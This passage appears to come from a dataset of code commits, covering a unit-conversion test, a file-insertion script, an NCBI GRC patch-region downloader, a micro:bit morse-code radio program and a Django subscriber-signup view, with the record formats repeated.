<commit_before><commit_msg>Test functions to convert units.<commit_after>
|
import unittest
from src.convert import kilometers_to_miles, miles_to_kilometers, \
years_to_minutes, minutes_to_years
class TestConvert(unittest.TestCase):
def test_km_2_mi(self):
actual = kilometers_to_miles(1)
expected = 0.621 # From Brian, from Google
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_mi_2_km(self):
actual = miles_to_kilometers(1)
expected = 1.609
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_yrs_2_min(self):
self.assertEqual(525600, years_to_minutes(1))
def test_min_2_yrs(self):
self.assertEqual(1, minutes_to_years(525600))
# Run the tests when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
Test functions to convert units.import unittest
from src.convert import kilometers_to_miles, miles_to_kilometers, \
years_to_minutes, minutes_to_years
class TestConvert(unittest.TestCase):
def test_km_2_mi(self):
actual = kilometers_to_miles(1)
expected = 0.621 # From Brian, from Google
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_mi_2_km(self):
actual = miles_to_kilometers(1)
expected = 1.609
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_yrs_2_min(self):
self.assertEqual(525600, years_to_minutes(1))
def test_min_2_yrs(self):
self.assertEqual(1, minutes_to_years(525600))
# Run the tests when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
<commit_before><commit_msg>Test functions to convert units.<commit_after>import unittest
from src.convert import kilometers_to_miles, miles_to_kilometers, \
years_to_minutes, minutes_to_years
class TestConvert(unittest.TestCase):
def test_km_2_mi(self):
actual = kilometers_to_miles(1)
expected = 0.621 # From Brian, from Google
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_mi_2_km(self):
actual = miles_to_kilometers(1)
expected = 1.609
self.assertAlmostEqual(actual, expected, delta = 0.01)
def test_yrs_2_min(self):
self.assertEqual(525600, years_to_minutes(1))
def test_min_2_yrs(self):
self.assertEqual(1, minutes_to_years(525600))
# Run the tests when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
|
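The src.convert module exercised above is not part of this record. A hedged sketch of conversion functions consistent with the expected values in the tests - the constants are standard, the module layout is an assumption:

KM_PER_MILE = 1.609344        # international mile in kilometres
MINUTES_PER_YEAR = 525600     # 365-day year, matching the test

def kilometers_to_miles(km):
    return km / KM_PER_MILE   # 1 km -> ~0.621 mi, within the test's delta

def miles_to_kilometers(mi):
    return mi * KM_PER_MILE   # 1 mi -> ~1.609 km

def years_to_minutes(years):
    return years * MINUTES_PER_YEAR

def minutes_to_years(minutes):
    return minutes / MINUTES_PER_YEAR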
07f70ec2011f676cdb30eb9e41fedbc2657cbea1
|
insertfiles.py
|
insertfiles.py
|
#!/usr/bin/env python3
import filelister
import subprocess
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], stdout=subprocess.PIPE)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'])
filelister.insertfiles('bots/a2c.json')
|
Add functionality to insert files into the config file
|
Add functionality to insert files into the config file
|
Python
|
mit
|
BradleyCai/breadbot
|
Add functionality to insert files into the config file
|
#!/usr/bin/env python3
import filelister
import subprocess
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], stdout=subprocess.PIPE)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'])
filelister.insertfiles('bots/a2c.json')
|
<commit_before><commit_msg>Add functionality to insert files into the config file<commit_after>
|
#!/usr/bin/env python3
import filelister
import subprocess
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], stdout=subprocess.PIPE)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'])
filelister.insertfiles('bots/a2c.json')
|
Add functionality to insert files into the config file#!/usr/bin/env python3
import filelister
import subprocess
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], stdout=subprocess.PIPE)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'])
filelister.insertfiles('bots/a2c.json')
|
<commit_before><commit_msg>Add functionality to insert files into the config file<commit_after>#!/usr/bin/env python3
import filelister
import subprocess
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], stdout=subprocess.PIPE)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'])
filelister.insertfiles('bots/a2c.json')
|
|
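A note on the script above: neither subprocess.run call checks its exit status, so a failed extraction would still be followed by the mv and the insert. A hedged variant that stops on the first failure, assuming the same archive layout:

#!/usr/bin/env python3
import subprocess

# check=True raises CalledProcessError on a non-zero exit status, so a
# failed tar cannot silently fall through to the mv step.
subprocess.run(['tar', '-xzf', 'queue.tar.gz'], check=True)
subprocess.run(['mv', 'home/bread/winhome/pictures/anime/queue', 'bots'], check=True)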
c03db0a196d04b26ac671b16cb57a0f9fdfea82e
|
gemini/annotation_provenance/make-ncbi-grc-patches.py
|
gemini/annotation_provenance/make-ncbi-grc-patches.py
|
#!/usr/bin/env python
"""Retrieve information on patches and fixes to GRCh37 from GRC website.
Converts information on these regions into a BED file for Gemini import.
http://www.ncbi.nlm.nih.gov/projects/genome/assembly/grc/human/
"""
import urllib2
from collections import namedtuple
from operator import attrgetter
from contextlib import closing
patch = "p8"
base_url = "ftp://ftp.ncbi.nlm.nih.gov/genbank/genomes/Eukaryotes/" \
"vertebrates_mammals/Homo_sapiens/GRCh37.{0}/".format(patch)
sub_url = "/alt_scaffolds/alt_scaffold_placement.txt"
dirs = ["PATCHES"] + ["ALT_REF_LOCI_%s" % i for i in range(1, 10)]
def main():
out_file = "GRC_patch_regions.bed"
regions = []
for dname in dirs:
cur_url = base_url + dname + sub_url
for region in grc_regions_from_url(cur_url):
regions.append(region)
regions.sort(key=attrgetter("chrom", "start", "end"))
with open(out_file, "w") as out_handle:
for region in regions:
out_handle.write("{chrom}\t{start}\t{end}\t{name}\n".format(
**vars(region)))
def grc_regions_from_url(url):
GrcRegion = namedtuple("GrcRegion", "chrom,start,end,name")
with closing(urllib2.urlopen(url)) as in_handle:
header = in_handle.next()
for parts in (l.split("\t") for l in in_handle):
try:
chrom = int(parts[5])
except ValueError:
chrom = parts[5]
yield GrcRegion(chrom, int(parts[11]), int(parts[12]),
"grc_%s" % ("fix" if parts[2].endswith("PATCH") else "novel"))
if __name__ == "__main__":
main()
|
Add download script to get GRC patch regions for annotation
|
Add download script to get GRC patch regions for annotation
|
Python
|
mit
|
bgruening/gemini,bw2/gemini,heuermh/gemini,arq5x/gemini,xuzetan/gemini,bw2/gemini,bpow/gemini,arq5x/gemini,heuermh/gemini,bpow/gemini,bpow/gemini,bpow/gemini,arq5x/gemini,heuermh/gemini,bgruening/gemini,xuzetan/gemini,heuermh/gemini,bgruening/gemini,arq5x/gemini,bw2/gemini,bw2/gemini,udp3f/gemini,bgruening/gemini,udp3f/gemini,brentp/gemini,brentp/gemini,brentp/gemini,udp3f/gemini,xuzetan/gemini,brentp/gemini,xuzetan/gemini,udp3f/gemini
|
Add download script to get GRC patch regions for annotation
|
#!/usr/bin/env python
"""Retrieve information on patches and fixes to GRCh37 from GRC website.
Converts information on these regions into a BED file for Gemini import.
http://www.ncbi.nlm.nih.gov/projects/genome/assembly/grc/human/
"""
import urllib2
from collections import namedtuple
from operator import attrgetter
from contextlib import closing
patch = "p8"
base_url = "ftp://ftp.ncbi.nlm.nih.gov/genbank/genomes/Eukaryotes/" \
"vertebrates_mammals/Homo_sapiens/GRCh37.{0}/".format(patch)
sub_url = "/alt_scaffolds/alt_scaffold_placement.txt"
dirs = ["PATCHES"] + ["ALT_REF_LOCI_%s" % i for i in range(1, 10)]
def main():
out_file = "GRC_patch_regions.bed"
regions = []
for dname in dirs:
cur_url = base_url + dname + sub_url
for region in grc_regions_from_url(cur_url):
regions.append(region)
regions.sort(key=attrgetter("chrom", "start", "end"))
with open(out_file, "w") as out_handle:
for region in regions:
out_handle.write("{chrom}\t{start}\t{end}\t{name}\n".format(
**vars(region)))
def grc_regions_from_url(url):
GrcRegion = namedtuple("GrcRegion", "chrom,start,end,name")
with closing(urllib2.urlopen(url)) as in_handle:
header = in_handle.next()
for parts in (l.split("\t") for l in in_handle):
try:
chrom = int(parts[5])
except ValueError:
chrom = parts[5]
yield GrcRegion(chrom, int(parts[11]), int(parts[12]),
"grc_%s" % ("fix" if parts[2].endswith("PATCH") else "novel"))
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add download script to get GRC patch regions for annotation<commit_after>
|
#!/usr/bin/env python
"""Retrieve information on patches and fixes to GRCh37 from GRC website.
Converts information on these regions into a BED file for Gemini import.
http://www.ncbi.nlm.nih.gov/projects/genome/assembly/grc/human/
"""
import urllib2
from collections import namedtuple
from operator import attrgetter
from contextlib import closing
patch = "p8"
base_url = "ftp://ftp.ncbi.nlm.nih.gov/genbank/genomes/Eukaryotes/" \
"vertebrates_mammals/Homo_sapiens/GRCh37.{0}/".format(patch)
sub_url = "/alt_scaffolds/alt_scaffold_placement.txt"
dirs = ["PATCHES"] + ["ALT_REF_LOCI_%s" % i for i in range(1, 10)]
def main():
out_file = "GRC_patch_regions.bed"
regions = []
for dname in dirs:
cur_url = base_url + dname + sub_url
for region in grc_regions_from_url(cur_url):
regions.append(region)
regions.sort(key=attrgetter("chrom", "start", "end"))
with open(out_file, "w") as out_handle:
for region in regions:
out_handle.write("{chrom}\t{start}\t{end}\t{name}\n".format(
**vars(region)))
def grc_regions_from_url(url):
GrcRegion = namedtuple("GrcRegion", "chrom,start,end,name")
with closing(urllib2.urlopen(url)) as in_handle:
header = in_handle.next()
for parts in (l.split("\t") for l in in_handle):
try:
chrom = int(parts[5])
except ValueError:
chrom = parts[5]
yield GrcRegion(chrom, int(parts[11]), int(parts[12]),
"grc_%s" % ("fix" if parts[2].endswith("PATCH") else "novel"))
if __name__ == "__main__":
main()
|
Add download script to get GRC patch regions for annotation#!/usr/bin/env python
"""Retrieve information on patches and fixes to GRCh37 from GRC website.
Converts information on these regions into a BED file for Gemini import.
http://www.ncbi.nlm.nih.gov/projects/genome/assembly/grc/human/
"""
import urllib2
from collections import namedtuple
from operator import attrgetter
from contextlib import closing
patch = "p8"
base_url = "ftp://ftp.ncbi.nlm.nih.gov/genbank/genomes/Eukaryotes/" \
"vertebrates_mammals/Homo_sapiens/GRCh37.{0}/".format(patch)
sub_url = "/alt_scaffolds/alt_scaffold_placement.txt"
dirs = ["PATCHES"] + ["ALT_REF_LOCI_%s" % i for i in range(1, 10)]
def main():
out_file = "GRC_patch_regions.bed"
regions = []
for dname in dirs:
cur_url = base_url + dname + sub_url
for region in grc_regions_from_url(cur_url):
regions.append(region)
regions.sort(key=attrgetter("chrom", "start", "end"))
with open(out_file, "w") as out_handle:
for region in regions:
out_handle.write("{chrom}\t{start}\t{end}\t{name}\n".format(
**vars(region)))
def grc_regions_from_url(url):
GrcRegion = namedtuple("GrcRegion", "chrom,start,end,name")
with closing(urllib2.urlopen(url)) as in_handle:
header = in_handle.next()
for parts in (l.split("\t") for l in in_handle):
try:
chrom = int(parts[5])
except ValueError:
chrom = parts[5]
yield GrcRegion(chrom, int(parts[11]), int(parts[12]),
"grc_%s" % ("fix" if parts[2].endswith("PATCH") else "novel"))
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add download script to get GRC patch regions for annotation<commit_after>#!/usr/bin/env python
"""Retrieve information on patches and fixes to GRCh37 from GRC website.
Converts information on these regions into a BED file for Gemini import.
http://www.ncbi.nlm.nih.gov/projects/genome/assembly/grc/human/
"""
import urllib2
from collections import namedtuple
from operator import attrgetter
from contextlib import closing
patch = "p8"
base_url = "ftp://ftp.ncbi.nlm.nih.gov/genbank/genomes/Eukaryotes/" \
"vertebrates_mammals/Homo_sapiens/GRCh37.{0}/".format(patch)
sub_url = "/alt_scaffolds/alt_scaffold_placement.txt"
dirs = ["PATCHES"] + ["ALT_REF_LOCI_%s" % i for i in range(1, 10)]
def main():
out_file = "GRC_patch_regions.bed"
regions = []
for dname in dirs:
cur_url = base_url + dname + sub_url
for region in grc_regions_from_url(cur_url):
regions.append(region)
regions.sort(key=attrgetter("chrom", "start", "end"))
with open(out_file, "w") as out_handle:
for region in regions:
out_handle.write("{chrom}\t{start}\t{end}\t{name}\n".format(
**vars(region)))
def grc_regions_from_url(url):
GrcRegion = namedtuple("GrcRegion", "chrom,start,end,name")
with closing(urllib2.urlopen(url)) as in_handle:
header = in_handle.next()
for parts in (l.split("\t") for l in in_handle):
try:
chrom = int(parts[5])
except ValueError:
chrom = parts[5]
yield GrcRegion(chrom, int(parts[11]), int(parts[12]),
"grc_%s" % ("fix" if parts[2].endswith("PATCH") else "novel"))
if __name__ == "__main__":
main()
|
|
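The script above targets Python 2 (urllib2, in_handle.next()). A hedged sketch of the download loop ported to Python 3 - behaviour otherwise unchanged, and the FTP layout is taken on trust from the original:

from contextlib import closing
from urllib.request import urlopen

def grc_lines(url):
    # urllib.request replaces urllib2; the FTP response yields bytes,
    # so each line is decoded before splitting on tabs.
    with closing(urlopen(url)) as in_handle:
        next(in_handle)  # skip the header line, as the original does
        for raw in in_handle:
            yield raw.decode("ascii").rstrip("\n").split("\t")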
c99929e2aaa119104c20b0d865b8e42c0b15a03e
|
morse/morse_radio.py
|
morse/morse_radio.py
|
# Import modules
from microbit import *
import radio
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"g": "--.",
"h": "....",
"i": "..",
"j": ".---",
"k": "-.-",
"l": ".-..",
"m": "--",
"n": "-.",
"o": "---",
"p": ".--.",
"q": "--.-",
"r": ".-.",
"s": "...",
"t": "-",
"u": "..-",
"v": "...-",
"w": ".--",
"x": "-..-",
"y": "-.--",
"z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
morse_string = ""
pressed = 0
paused = 0
letters = []
radio.on()
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
#check for incoming messages
incoming = radio.receive()
if incoming is not None:
print(incoming.split("|"))
sent_letters = []
for letter in incoming.split("|"):
sent_letters.append(get_letter(letter) if letter != " " else " ")
display.scroll("".join(sent_letters))
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
morse_string += current_letter + "|"
current_letter = ""
if paused >= 200:
letters.append(" ")
morse_string += "| |"
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
morse_string += current_letter
display.scroll("".join(letters))
paused = 0
pressed = 0
print(morse_string)
radio.send(morse_string)
current_letter = ""
morse_string = ""
letters = []
|
Add ability to send morse code via radio
|
Add ability to send morse code via radio
|
Python
|
mit
|
OiNutter/microbit-scripts
|
Add ability to send morse code via radio
|
# Import modules
from microbit import *
import radio
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"g": "--.",
"h": "....",
"i": "..",
"j": ".---",
"k": "-.-",
"l": ".-..",
"m": "--",
"n": "-.",
"o": "---",
"p": ".--.",
"q": "--.-",
"r": ".-.",
"s": "...",
"t": "-",
"u": "..-",
"v": "...-",
"w": ".--",
"x": "-..-",
"y": "-.--",
"z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
morse_string = ""
pressed = 0
paused = 0
letters = []
radio.on()
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
#check for incoming messages
incoming = radio.receive()
if incoming is not None:
print(incoming.split("|"))
sent_letters = []
for letter in incoming.split("|"):
sent_letters.append(get_letter(letter) if letter != " " else " ")
display.scroll("".join(sent_letters))
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
morse_string += current_letter + "|"
current_letter = ""
if paused >= 200:
letters.append(" ")
morse_string += "| |"
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
morse_string += current_letter
display.scroll("".join(letters))
paused = 0
pressed = 0
print(morse_string)
radio.send(morse_string)
current_letter = ""
morse_string = ""
letters = []
|
<commit_before><commit_msg>Add ability to send morse code via radio<commit_after>
|
# Import modules
from microbit import *
import radio
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"g": "--.",
"h": "....",
"i": "..",
"j": ".---",
"k": "-.-",
"l": ".-..",
"m": "--",
"n": "-.",
"o": "---",
"p": ".--.",
"q": "--.-",
"r": ".-.",
"s": "...",
"t": "-",
"u": "..-",
"v": "...-",
"w": ".--",
"x": "-..-",
"y": "-.--",
"z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
morse_string = ""
pressed = 0
paused = 0
letters = []
radio.on()
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
#check for incoming messages
incoming = radio.receive()
if incoming is not None:
print(incoming.split("|"))
sent_letters = []
for letter in incoming.split("|"):
sent_letters.append(get_letter(letter) if letter != " " else " ")
display.scroll("".join(sent_letters))
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
morse_string += current_letter + "|"
current_letter = ""
if paused >= 200:
letters.append(" ")
morse_string += "| |"
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
morse_string += current_letter
display.scroll("".join(letters))
paused = 0
pressed = 0
print(morse_string)
radio.send(morse_string)
current_letter = ""
morse_string = ""
letters = []
|
Add ability to send morse code via radio# Import modules
from microbit import *
import radio
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"g": "--.",
"h": "....",
"i": "..",
"j": ".---",
"k": "-.-",
"l": ".-..",
"m": "--",
"n": "-.",
"o": "---",
"p": ".--.",
"q": "--.-",
"r": ".-.",
"s": "...",
"t": "-",
"u": "..-",
"v": "...-",
"w": ".--",
"x": "-..-",
"y": "-.--",
"z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
morse_string = ""
pressed = 0
paused = 0
letters = []
radio.on()
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
#check for incoming messages
incoming = radio.receive()
if incoming is not None:
print(incoming.split("|"))
sent_letters = []
for letter in incoming.split("|"):
sent_letters.append(get_letter(letter) if letter != " " else " ")
display.scroll("".join(sent_letters))
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
morse_string += current_letter + "|"
current_letter = ""
if paused >= 200:
letters.append(" ")
morse_string += "| |"
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
morse_string += current_letter
display.scroll("".join(letters))
paused = 0
pressed = 0
print(morse_string)
radio.send(morse_string)
current_letter = ""
morse_string = ""
letters = []
|
<commit_before><commit_msg>Add ability to send morse code via radio<commit_after># Import modules
from microbit import *
import radio
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"g": "--.",
"h": "....",
"i": "..",
"j": ".---",
"k": "-.-",
"l": ".-..",
"m": "--",
"n": "-.",
"o": "---",
"p": ".--.",
"q": "--.-",
"r": ".-.",
"s": "...",
"t": "-",
"u": "..-",
"v": "...-",
"w": ".--",
"x": "-..-",
"y": "-.--",
"z": "--..",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7": "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
morse_string = ""
pressed = 0
paused = 0
letters = []
radio.on()
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
#check for incoming messages
incoming = radio.receive()
if incoming is not None:
print(incoming.split("|"))
sent_letters = []
for letter in incoming.split("|"):
sent_letters.append(get_letter(letter) if letter != " " else " ")
display.scroll("".join(sent_letters))
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
morse_string += current_letter + "|"
current_letter = ""
if paused >= 200:
letters.append(" ")
morse_string += "| |"
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
morse_string += current_letter
display.scroll("".join(letters))
paused = 0
pressed = 0
print(morse_string)
radio.send(morse_string)
current_letter = ""
morse_string = ""
letters = []
|
|
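The wire format used by radio.send above is a pipe-delimited string of morse codes, with a lone space token marking a word gap. A hedged sketch of an encoder that produces that same payload from plain text - the helper name is invented, and only an excerpt of the dictionary is repeated here:

def encode_for_radio(message, table):
    # One morse code per letter, joined with "|"; a bare " " token
    # becomes the "| |" word gap the receiver looks for.
    tokens = []
    for ch in message.lower():
        if ch == " ":
            tokens.append(" ")
        elif ch in table:
            tokens.append(table[ch])
    return "|".join(tokens)

morse_excerpt = {"s": "...", "o": "---"}
assert encode_for_radio("sos os", morse_excerpt) == "...|---|...| |---|..."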
7ed12facca2f94eb8bba721e9b11882ea24726fe
|
crmapp/subscribers/views.py
|
crmapp/subscribers/views.py
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
# Create the User record
user = User(username=username, email=email)
user.set_password(password)
user.save()
# Create Subscriber Record
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
from .models import Subscriber
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
# Create the User record
user = User(username=username, email=email,
first_name=first_name, last_name=last_name)
user.set_password(password)
user.save()
# Create Subscriber Record
address_one = form.cleaned_data['address_one']
address_two = form.cleaned_data['address_two']
city = form.cleaned_data['city']
state = form.cleaned_data['state']
sub = Subscriber(address_one=address_one, address_two=address_two,
city=city, state=state, user_rec=user)
sub.save()
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
Create the Subscriber Form - Part II > Update the View
|
Create the Subscriber Form - Part II > Update the View
|
Python
|
mit
|
deenaariff/Django,tabdon/crmeasyapp,tabdon/crmeasyapp
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
# Create the User record
user = User(username=username, email=email)
user.set_password(password)
user.save()
# Create Subscriber Record
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
Create the Subscriber Form - Part II > Update the View
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
from .models import Subscriber
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
# Create the User record
user = User(username=username, email=email,
first_name=first_name, last_name=last_name)
user.set_password(password)
user.save()
# Create Subscriber Record
address_one = form.cleaned_data['address_one']
address_two = form.cleaned_data['address_two']
city = form.cleaned_data['city']
state = form.cleaned_data['state']
sub = Subscriber(address_one=address_one, address_two=address_two,
city=city, state=state, user_rec=user)
sub.save()
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
<commit_before>from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
# Create the User record
user = User(username=username, email=email)
user.set_password(password)
user.save()
# Create Subscriber Record
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
<commit_msg>Create the Subscriber Form - Part II > Update the View<commit_after>
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
from .models import Subscriber
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
# Create the User record
user = User(username=username, email=email,
first_name=first_name, last_name=last_name)
user.set_password(password)
user.save()
# Create Subscriber Record
address_one = form.cleaned_data['address_one']
address_two = form.cleaned_data['address_two']
city = form.cleaned_data['city']
state = form.cleaned_data['state']
sub = Subscriber(address_one=address_one, address_two=address_two,
city=city, state=state, user_rec=user)
sub.save()
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
# Create the User record
user = User(username=username, email=email)
user.set_password(password)
user.save()
# Create Subscriber Record
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
Create the Subscriber Form - Part II > Update the Viewfrom django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
from .models import Subscriber
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
# Create the User record
user = User(username=username, email=email,
first_name=first_name, last_name=last_name)
user.set_password(password)
user.save()
# Create Subscriber Record
address_one = form.cleaned_data['address_one']
address_two = form.cleaned_data['address_two']
city = form.cleaned_data['city']
state = form.cleaned_data['state']
sub = Subscriber(address_one=address_one, address_two=address_two,
city=city, state=state, user_rec=user)
sub.save()
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
<commit_before>from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
# Create the User record
user = User(username=username, email=email)
user.set_password(password)
user.save()
# Create Subscriber Record
# Process payment (via Stripe)
# Auto login the user
